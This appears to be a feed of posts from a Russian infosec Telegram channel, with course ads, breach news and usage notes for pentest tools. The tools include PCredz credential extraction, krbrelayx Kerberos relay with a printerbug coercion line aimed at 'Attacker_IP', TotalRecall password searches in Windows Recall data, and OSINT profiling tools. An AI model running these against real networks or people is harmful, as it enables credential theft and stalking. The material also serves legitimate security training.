34787
Крупнейшее ИБ сообщество ру-сегмента Чат: @codeby_one Форум: codeby.net Обучение: codeby.school Пентест: codeby.one CTF: codeby.games VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Номер заявления для регистрации канала в РКН: 5035340278
💅 Tracecat — инструмент AI‑автоматизации для SecOps
Tracecat — открытая платформа автоматизации с ИИ для security и IT-команд: позволяет собирать workflows, оркестрировать алерты, вести кейсы и работать с таблицами в одном месте. Данный инструмент можно использовать как лёгкую, расширяемую альтернативу коммерческим SOAR/automation‑решениям.
PCredz — автоматический анализатор трафика для извлечение учетных данных
PCredz — лёгкая, но мощная утилита для извлечения учетных данных, хэшей и другой чувствительной информации из pcap-файлов или живого сетевого трафика. Инструмент активно используют пентестеры, DFIR-аналитики и исследователи сетевой безопасности благодаря удобству, скорости и широкой поддержке протоколов.
git clone https://github.com/lgandx/PCredz
cd PCredz
docker build . -t pcredz
docker run --net=host -v $(pwd):/opt/Pcredz -it pcredz
apt install python3-pip libpcap-dev file
pip3 install Cython python-libpcap
python3 ./Pcredz -f capture.pcap
python3 ./Pcredz -d /tmp/pcaps/
python3 ./Pcredz -i eth0 -v
-f <file> Парсинг pcap-файла-d <dir> Рекурсивный разбор каталога-i <interface> Живой перехват трафика-v Подробный вывод-o <dir> Директория для логов
Многие думают, что безопасность приложений — задача программистов. Но на самом деле первую линию обороны создают пентестеры — «белые хакеры», которые целенаправленно ищут слабые места, пока это не сделали злоумышленники.
Разбираем:
🟧Кто такой пентестер и почему без него не обойтись
🟧Что реально нужно знать и уметь: от сетей и Linux до Python и веб-технологий
🟧С чего начать путь: чек-лист от основ до первых сертификатов
🟧Где бесплатно практиковаться и что положить в портфолио
В статье — готовый маршрут от изучения базовых команд до собеседования на первую позицию.
🟧На форуме вы найдете еще больше актуальной и полезной информации для начинающих и опытных специалистов. Изучайте темы от WAPT и уязвимостей вроде Log4Shell до тестирования AI, атак на умные города и промышленные системы.
🟧Делитесь в комментариях: что кажется вам самым сложным на пути в пентест? Расскажите о своем опыте, первых трудностях или задавайте вопросы🟧
➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
#снуля #обучение #новичкам #пентест #hackerlab #форум
🫡 Spotify «взяли на абордаж». Пираты слили в сеть 86 млн треков
Популярный музыкальный сервис Spotify столкнулся с одним из крупнейших пиратских взломов в истории стриминга — хакеры получили доступ почти ко всей библиотеке платформы и выложили в открытый доступ 86 млн аудиотреков общим объёмом более 300 ТБ.
За инцидент взяла ответственность группировка Anna’s Archive, называющая себя «Робин Гудами цифровой эпохи» и заявляющая миссию «сохранения культурного наследия человечества». Они опубликовали ссылки на скачивание всей выгрузки.
По словам взломщиков:
🔼 слиты только самые популярные треки
🔼 на эти 86 млн композиций приходится 99,6% всех прослушиваний Spotify
🔼 оригинальный каталог сервиса — около 256 млн треков
Файлы распространяются через торрент‑раздачи в формате OGG Vorbis 160 Кбит/с. Хакеры подчёркивают, что выбрали «среднее качество» намеренно — чтобы «сохранить музыкальное наследие» в компактном виде. Все треки содержат оригинальные метаданные.
✅ Spotify подтвердил факт взлома и начало расследования.
✅ Однако архив уже доступен в сети, и удалить его теперь невозможно.
Этот инцидент — тревожный сигнал для всей индустрии:
даже крупнейшие стриминговые платформы с мощной DRM‑защитой оказываются уязвимы, когда мотивированные группы находят способ обойти барьеры.
➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
#Spotify #Взлом #УтечкаДанных #Кибербезопасность #Кибератака
Как найти слабые места в веб-приложении до того, как их найдут хакеры?
Расскажем на курсе WAPT от Академии Кодебай! 🛡 Это на 100% практический курс по пентесту, где вы попробуете изученные техники взлома в 65-ти заданиях нашей лаборатории!
🔴 Каждую неделю — вебинары с куратором! Старт 22 января. Регистрация здесь.
Содержание курса:
✦ эксплуатация всех актуальных типов уязвимостей, активный / пассивный фаззинг
✦ SQL Injection и CMD Injection, Cross Site Scripting, PHP injection, Server Side Template injection
✦ техники повышения привилегий, Client-side атаки (XSS, CSRF)
Получите практические навыки как в рабочих задачах, так и в Bug Bounty. 🚀 По всем вопросам пишите @CodebyAcademyBot
🎄 Сегодня стартовал новогодний CTF от HackerLab × «Хакер»!
С 21 декабря в нашем боте каждый день будет появляться новая задача дня.
🧩 Решай задания → 🗝 собирай ключи → 🎁 участвуй в розыгрыше призов.
🕛 Первое задание уже доступно в боте!
➡️ Заходи в бота и решай задачи: @HLxXakepBot
🚩 Новые задания на платформе HackerLab!
⚙️ Категория Реверс-инжиниринг — Вишнёвая семёрка
🧰 Категория PWN — Говори — и будет исполнено
——————————————
🗂 В архив добавлены задания Киберколизея IV
Приятного хакинга!
CloakQuest3r
CloakQuest3r — это мощный инструмент на Python, тщательно разработанный для раскрытия истинного IP-адреса веб-сайтов, защищённых Cloudflare и другими альтернативными сервисами, широко распространённым сервисом веб-безопасности и повышения производительности. Его основная задача — точно определить фактический IP-адрес веб-серверов, скрытых за защитой Cloudflare. Сканирование поддоменов является ключевым методом решения этой задачи. Этот инструмент — бесценный ресурс для тестировщиков на проникновение, специалистов по безопасности и веб-администраторов, стремящихся провести комплексную оценку безопасности и выявить уязвимости, которые могут быть скрыты мерами безопасности Cloudflare.
📕Характеристика:
➖Обнаружение реального IP-адреса: CloakQuest3r превосходно определяет реальные IP-адреса веб-серверов, использующих сервисы Cloudflare.
➖Сканирование поддоменов: Сканирование поддоменов является основополагающим компонентом процесса определения реального IP-адреса. Оно помогает определить фактический сервер, ответственный за размещение веб-сайта и связанных с ним поддоменов.
➖История IP-адресов: Извлекает историческую информацию об IP-адресах для заданного домена.
➖Анализ SSL-сертификата: Извлекает и анализирует SSL-сертификаты, связанные с целевым доменом.
Поточное сканирование: Для повышения эффективности и ускорения процесса определения реального IP-адреса CloakQuest3r использует многопоточность.
💻Установка:
git clone https://github.com/spyboy-productions/CloakQuest3r.git
cd CloakQuest3r
python cloakquest3r.py example.com
Mailcat
Mailcat - Найдите существующие адреса электронной почты по нику, используя методы проверки API/SMTP без уведомления пользователя.
📕Характеристики:
➖Удобный интерфейс
➖Поддержка tor
➖Поддержка proxy
💻Установка:
git clone https://github.com/sharsil/mailcat.git
cd mailcat
pip3 install -r requirements.txt --break-system-packages
python3 mailcat.py <NICKNAME>
python3 mailcat.py --tor <NICKNAME>
proxychains4 -q python3 mailcat.py <NICKNAME>
python3 mailcat.py <NICKNAME> --proxy http://127.0.0.1:8080
🔔 Python стал универсальным инструментом, который снимает рутину с пентестера и ускоряет работу.
Посмотрим, как это происходит на практике. ⬆️
🟧 uncover
Инструмент, использующий API известных поисковых систем для быстрого обнаружения открытых хостов в интернете.
Обладает следующими характеристиками
🟧Одновременный запрос к нескольким поисковым системам;
🟧Поддержка доступных поисковых систем: Shodan, Censys, FOFA, Hunter, Quake, ZoomEye, Netlas, CriminalIP, PublicWWW, HunterHow, Google, Onyphe, Driftnet;
🟧Поддерживает ввод нескольких ключей API;
🟧Автоматическая рандомизация ключей API;
🟧Вывод uncover можно перенаправить в другие проекты в рамках рабочего процесса, принимающие stdin в качестве входных данных (например, uncover -q example -f ip | naabu).
Для успешной установки требуется go1.21.
go install -v github.com/projectdiscovery/uncover/cmd/uncover@latest
$CONFIG/uncover/provider-config.yaml. Пример данного файла представлен ниже:echo 'ssl:"Uber Technologies, Inc."' | uncover
echo jira | uncover -e shodan,censys,fofa,quake,hunter,zoomeye,netlas,criminalip,driftnet
echo 8.8.8.8/20 | uncover -e driftnet
uncover -q http.title:GitLab -silent | httpx -silent
Findsploit
Finsploit — это простой bash-скрипт для быстрого и лёгкого поиска по локальным и онлайн-базам данных эксплойтов. Этот репозиторий также включает в себя «copysploit» для копирования любого эксплойта exploit-db в текущий каталог и «compilesploit» для автоматической компиляции и запуска любого эксплойта на языке C.
💻Установка:
git clone https://github.com/1N3/Findsploit.git
cd Findsploit
./findsploit
./findsploit <WORD> (например apache)
./findsploit <WORD> <WORD>
./findsploit exploits
🟧🟧🟧🟧 Мы запускаем флагманскую программу по Application Security!
AppSec — одно из самых востребованных и быстрорастущих направлений в кибербезопасности.
И теперь у нас есть полный 7-месячный практический курс, который готовит к работе в реальных проектах — от поиска уязвимостей до внедрения безопасного SDLC и DevSecOps.
Что ждёт на программе?
🟧 200+ часов практики
🟧 Личный стенд: SQLi, XSS, SSRF, LFI, IDOR, Race Condition и др.
🟧 Работа с SAST (Semgrep), DAST (Burp/ZAP/OAST), SCA (Trivy)
🟧 Secure SDLC, Threat Modeling, CVE/CWE/CVSS
🟧 Автоматизация безопасности в CI/CD
🟧 Финальный capstone: mini-CTF, созданный своими руками
🟧 Большое портфолио из 9 проектов, закрывающее требования junior-вакансий
🎓 По итогам — диплом о профпереквалификации и готовность выйти на рынок как:
Junior/Middle AppSec Engineer, Web-Pentester, Security Developer, DevSecOps-инженер.
Старт: 16 февраля
🟧🟧🟧 Первый поток доступен со скидкой 10%: 120.000 руб. 108.000 руб.
Набор открыт:
🟧 https://codeby.school/appsec.html
Б — безопасность, значит, д — доверие.
В VK специалисты ИБ создают защиту, которая работает незаметно, но надёжно. Узнайте из первых уст, как строится их работа. Переходите по ссылке — читайте про цели, миссию и команду, которая стоит на страже цифрового пространства.
🟧Короткий разбор, как работает MFA и почему разные способы защиты дают разный уровень безопасности.
А какой метод используете вы — и считаете ли его достаточно надёжным?
WhatsApp* не собирается сдаваться💪
В WhatsApp* отреагировали на ограничения в работе мессенджера в России. Компания считает, что власти РФ хотят лишить людей возможности свободно общаться. Также компания заявила, что мессенджер МАХ, небезопасен - там могут украсть личные данные.
22 декабря, российские пользователи пожаловались на ограничения в работе WhatsApp* — более 3000 жалоб. 23 числа WhatsApp* опубликовала официальное заявление. В нем компания обвинила российские власти в нарушении прав 100 млн пользователей.
"Ограничивая доступ к WhatsApp*, российское правительство стремится лишить более 100 млн человек права на конфиденциальное общение с использованием сквозного шифрования прямо перед новогодними праздниками" — заявили в WhatsApp*.
В начале декабря 2025 года Роскомнадзор начал постепенно ограничивать работу WhatsApp* в России. Тогда в ведомстве объяснили, что площадка используется мошенниками, а сам мессенджер этого не пресекает.
"Мы намерены бороться за наших пользователей, потому что принуждение людей к использованию менее безопасных приложений, одобренных государством, может привести лишь к снижению уровня безопасности для россиян" - заявили в WhatsApp*.
Источник: https://www.gazeta.ru/tech/news/2025/12/23/27482941.shtml
*
*Компания Meta, а также её продукты (WhatsApp) признаны экстремистскими в России
#news #WhatsApp #Russia
➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Очень маленькая и полезная шпаргалка по контролю прав и разрешений в Linux.
➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
#Linux #Шпаргалка #ПраваLinux
GhostEyes
GhostEyes — это асинхронный, модульный набор инструментов для наступательной разведки, предназначенный для сетевой и веб-разведки, а также для создания отчетов, предназначенный для специалистов по тестированию на проникновение, красных команд и исследователей.
📕Характеристика:
Сетевая разведка: Сканирование подсети ARP, Обнаружение и выборка VLAN, DHCP-снупинг
Веб-разведка: Брутфорс поддоменов, Брутфорс директорий
Отчеты: Генерация TXT/JSON/HTML/CSV на основе предыдущих сканирований
💻Установка:
git clone https://github.com/6lackRaven/GhostEyes.git
cd GhostEyes
python ghosteyes.py net -i <INTERFACE> --scan <IP> --output <JSON-FILE>
python ghosteyes.py net -i <INTERFACE> --vlan --duration 120
python ghosteyes.py web -u <DOMAIN> -s <WORDLIST> -T
🎄В преддверии Нового года мы подготовили для вас подборку идей подарков для тех, кто увлекается информационной безопасностью.
🎁Среди идей — и наш подарочный сертификат. Это возможность подарить полезные знания и навыки в сфере ИБ. Подробнее об оформлении и формате сертификата.
А какой из них порадовал бы именно вас? Делитесь своими мыслями в комментариях!
➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
#ИдеиПодарков #Сертификат #ИнформационнаяБезопасность
SSLyze: Автоматизированный аудит SSL/TLS конфигураций серверов
SSLyze — это быстрый и мощный инструмент для сканирования SSL/TLS, написанный на Python. Он предназначен для автоматизированного анализа конфигураций серверов с целью проверки использования надежных криптографических настроек (сертификатов, наборов шифров) и выявления уязвимостей к известным атакам.
sudo apt install sslyze
Проверка
sslyze -h
⏩Базовое сканирование одного хоста
python -m sslyze example.com
⏩Сканирование нескольких целей за один запуск
python -m sslyze example.com google.com:443 192.168.1.10:8443
⏩Сканирование списка целей из файла
Предварительно создайте файл targets.txt, где каждая новая строка содержит адрес хоста (с портом или без):
example.com
api.example.com:443
192.168.1.100:8443
Запустите сканирование
python -m sslyze --targets_in targets.txt
⏩Проверка на соответствие стандарту Mozilla Intermediate
python -m sslyze --mozilla_config=intermediate example.com
Инструмент выведет результат («OK - Supported» или «FAILED - Not supported») и вернет соответствующий код выхода (0 при успехе, не 0 при наличии проблем), что удобно для CI/CD
⏩Расширенная проверка с фокусировкой на конкретные уязвимости
python -m sslyze --heartbleed --robot --certinfo example.com
⏩Сохранение полного отчета о сканировании в JSON-файл
python -m sslyze --json_out=scan_results.json example.com
Очень полезная шпаргалка по GIT, которая поможет вам чувствоваться себя уверенее в окружении.
➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером
WhatsMyName: как найти цифровой след человека за пару кликов 🔍
WhatsMyName — это OSINT-инструмент, который позволяет быстро проверить, на каких онлайн-платформах используется конкретное имя пользователя.
Без взлома. Без магии. Только открытые данные — и плохие привычки пользователей.
❓ Что делает WhatsMyName
Инструмент проверяет сотни сайтов: соцсети, форумы, хостинги кода, сервисы для разработчиков, маркетплейсы и нишевые площадки.
Ты вводишь ник — сервис проверяет, зарегистрирован ли он на известных платформах.
Результат — список ресурсов, где этот username уже занят или существует.
И этого более чем достаточно, чтобы начать раскрутку личности.
Через WhatsMyName можно:
➡️ связать аккаунты человека на разных платформах
➡️ найти старые или забытые профили
➡️ определить интересы, профессию, хобби
➡️ подготовить фишинговую атаку или социальную инженерию
➡️ собрать профиль цели для дальнейшего OSINT
Для пентестера — инструмент.
Для журналиста — источник.
Для сталкера — оружие.
Для обычного пользователя — повод задуматься.
🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!
➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером
🟠Цифровая интимность на витрине. Компрометация PornHub ⚫️
Хакерская группировка ShinyHunters заявила о компрометации данных ≈200 миллионов пользователей Pornhub, сообщает Reuters. Злоумышленники требуют выкуп в биткоинах, угрожая публикацией информации в открытом доступе.
ShinyHunters — одна из самых известных киберпреступных группировок, специализирующихся на кражах и продаже баз данных, вымогательстве и массовых утечках персональных данных. Активны как минимум с 2020 года и за это время стали синонимом крупных data breach-инцидентов. Деятельность данной группировки связывают с утечками данных: Tokopedia, Wattpad, Pixlr, Wishbone, Mathway, HomeChef.
SSLScan: Инструмент для аудита SSL/TLS конфигураций
SSLScan — это утилита командной строки, предназначенная для глубокого анализа конфигурации SSL/TLS на удаленных серверах. Его основная задача — проверка поддерживаемых протоколов, шифров и выявление устаревших или небезопасных настроек путем установки соединений с целевым хостом. В отличие от ручной проверки, SSLScan предоставляет структурированный и полный отчет о состоянии безопасности криптографических протоколов сервера.
sudo apt install sslscanПроверка
sslscan -h
sslscan example.comЭта команда выполнит все основные проверки для домена example.com на стандартном порту 443
sslscan example.com:8443Полезно для проверки нестандартных HTTPS-портов, часто используемых в API или внутренних сервисах
sslscan --tls13 --tls12 example.com
sslscan --no-cipher-details --no-renegotiation --no-compression --no-fallback example.comОпция --no-cipher-details ускоряет сканирование, пропуская детальный анализ каждого шифра
sslscan --xml=report.xml example.com
Krbrelayx: Инструментарий для исследования и эксплуатации Kerberos в Active Directory
Krbrelayx — это набор инструментов на языке Python, разработанный для демонстрации и проверки уязвимостей, связанных с протоколом Kerberos и службой каталогов Active Directory. Основное внимание уделяется техникам спуфинга и ретрансляции, которые могут позволить злоумышленнику получить несанкционированный доступ или повысить привилегии в корпоративной среде.
sudo apt install krbrelayx
krbrelayx -h
cd krbrelayx
pip install -r requirements.txt
krbrelayx -t ldap://dc02.domain.local # Он будет ожидать входящих соединений Kerberos и ретранслировать их на целевой сервер (например, файловый ресурс)
printerbug domain.local/dc01\$@dc01.domain.local Attacker_IP # Аутентифицироваться на указанном IP атакующего (Attacker_IP) под учетной записью компьютера dc01$
krbrelayx -t ldap://dc01.corp.local -wh wpad.corp.local -wa 2
Namechk: Ваш Шерлок Холмс в мире цифровых следов и как защититься от его "темной стороны"
🔍Открытые данные — это пазл, который можно собрать в целостную картину о человеке или компании. Инструменты вроде Namechk превращают поиск по никнейму из рутинной задачи в мощный метод цифровой разведки.
Наша статья — практическое руководство по использованию OSINT (разведки по открытым источникам) для специалистов по безопасности и всех, кто хочет лучше защитить свои данные.
Вы узнаете, как:
💠Быстро находить профили по никнейму — автоматизируйте проверку сотен платформ за минуту. Узнаете, где ваш «старый» аккаунт уже фигурирует в слитых базах, и как это используют для фишинга и социальной инженерии.
💠Снизить риски кибератак — защитите бренд от фейков и клонов. Научитесь выявлять поддельные корпоративные аккаунты и страницы ключевых сотрудников, созданные для мошенничества.
💠Проводить аудит своей цифровой уязвимости — получите пошаговый метод, как оценить, что о вас или вашей компании знают в сети. Поймёте, какую информацию стоит скрыть, чтобы минимизировать риски.
Хотите погрузиться в тему глубже и начать применять OSINT на практике? 📌Читайте полную статью с детальными инструкциями и реальными примерами.
↖️Готовы превратить отдельные инструменты OSINT в цельное расследование? Ждём вас на курсе «OSINT: технология боевой разведки». Старт 26 января!
🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!
➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером
👀 TotalRecall
Инструмент извлекает и отображает данные из Windows Recall, предоставляя удобный способ доступа к информации о снимках активности вашего ПК.
Windows Recall — это функция Microsoft, впервые представленная в 2024 году, которая автоматически делает снимки того, что происходит на экране ПК каждые пять секунд, если содержимое экрана отличается от предыдущего снимка, и сохраняет их в локальной базе данных.
Функция Recall позволяет искать контент, включая изображения и текст, с помощью естественного языка. Является частью экосистемы Copilot+ PC и интегрирована в Windows 11 и новую AI-платформу Microsoft.
C:\Users\$USER\AppData\Local\CoreAIPlatform.00\UKP\{GUID}.\ImageStore\. totalrecall.py [-h] [--from_date FROM_DATE] [--to_date TO_DATE] [--search SEARCH]
totalrecall.py --search password --from_date 2024-06-04 --to_date 2024-06-05
BBOT — мощный автоматизированный сканер для Recon, Bug Bounty и ASM
BBOT — мультифункциональный сканер, вдохновлённый Spiderfoot, созданный для автоматизации разведки, поиска поддоменов, web-сканирования и анализа атакуемой поверхности. Инструмент сочетает мощные модули, находит значительно больше данных, чем классические OSINT-инструменты, и масштабируется под любые задачи.
pipx install bbot
# dev-ветка:
pipx install --pip-args '--pre' bbot
bbot -t evilcorp.com -p subdomain-enum
bbot -t evilcorp.com -p spider
bbot -t evilcorp.com -p email-enum
bbot -t www.evilcorp.com -p web-basic
bbot -t evilcorp.com -p kitchen-sink --allow-deadly
🎄 Что подарить на Новый год тому, кто в теме? В Академии Кодебай открылись продажи новогодних подарочных сертификатов!
Если вы ищете подарок, который действительно имеет ценность — мы создали его.
Теперь вы можете подарить близкому человеку не вещь, а возможность изменить профессию, усилить навыки и выйти на новый уровень.
🎁 Премиальный подарок для будущего профессионала.
🎁 Практичный выбор для тех, кто ценит развитие.
🎁 Подарок с долгосрочной ценностью.
Выберите формат:
↖️ Сертификат на один курс
↖️ Сертификат-номинал
Получатель сам выбирает направление обучения: от веб-пентеста и SOC до самых свежих новинок — DevSecOps и Appsec-инженер!
Сертификат приходит на e-mail в виде стильного PDF, который можно красиво вручить лично или отправить онлайн.
⬇️ Продажи уже открыты.
🛠 В данный момент платформа подвергается беспрецедентной целенаправленной DDoS-атаке.
➡️Мы продолжаем работы по стабилизации и планируем запустить соревнования в 18:00 МСК. Продолжительность соревнований будет скорректирована - никто не потеряет игровое время.
🎁 Все участники получат приятные бонусы.
Благодарим за терпение и понимание ❤️